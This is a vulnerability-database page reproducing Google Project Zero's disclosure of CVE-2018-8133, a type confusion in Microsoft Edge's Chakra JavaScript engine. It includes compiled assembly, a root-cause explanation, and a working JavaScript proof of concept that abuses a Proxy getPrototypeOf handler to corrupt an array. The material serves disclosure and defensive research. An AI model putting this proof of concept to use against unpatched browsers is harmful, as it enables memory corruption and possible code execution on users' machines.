Vulners
Lucene search
Microsoft Edge Chakra EntrySimpleObjectSlotGetter Type Confusion
🗓️ 31 May 2018 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 45 Views
| Reporter | Title | Published | Views | Family All 43 |
|---|---|---|---|---|
 | Microsoft Edge Chakra EntrySimpleObjectSlotGetter Type Confusion Exploit | 31 May 201800:00 | – | zdt |
 | CVE-2018-8133 | 31 May 201800:00 | – | circl |
 | Microsoft ChakraCore and Edge Remote Code Execution Vulnerability (CNVD-2018-10205) | 9 May 201800:00 | – | cnvd |
 | Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2018-8133) | 8 May 201800:00 | – | checkpoint_advisories |
 | CVE-2018-8133 | 9 May 201819:00 | – | cve |
 | CVE-2018-8133 | 9 May 201819:00 | – | cvelist |
| CVE-2018-8177 | 9 May 201819:00 | – | cvelist |
 | ChakraCore RCE Vulnerability | 13 May 202201:20 | – | github |
 | May 8, 2018—KB4103716 (OS Build 10240.17861) | 8 May 201807:00 | – | mskb |
| May 8, 2018—KB4103721 (OS Build 17134.48) | 8 May 201807:00 | – | mskb |
10
`Microsoft Edge: Chakra: EntrySimpleObjectSlotGetter can have side effects
CVE-2018-8133
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt(window, arr);
}
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50) // w.event
000001a8`80001235 48ffd0 call rax
000001a8`80001238 488b8e30bdf0ff mov rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158 movsd xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418 movsd mmword ptr [r12+18h],xmm0 // arr[0] = 2.3023e-320;
...
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
PoC:
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow;
for (let i = 0; i < 100000; i++) {
opt(window, [1.1]);
}
let set_callback = new f.contentWindow.Function('callback', `
window.__lookupSetter__('event').call(parent, new Proxy({}, {
getPrototypeOf() {
callback();
return {};
}
}));`);
let arr = [1.1];
set_callback(() => {
arr[0] = {};
});
opt(window, arr);
alert(arr);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.62258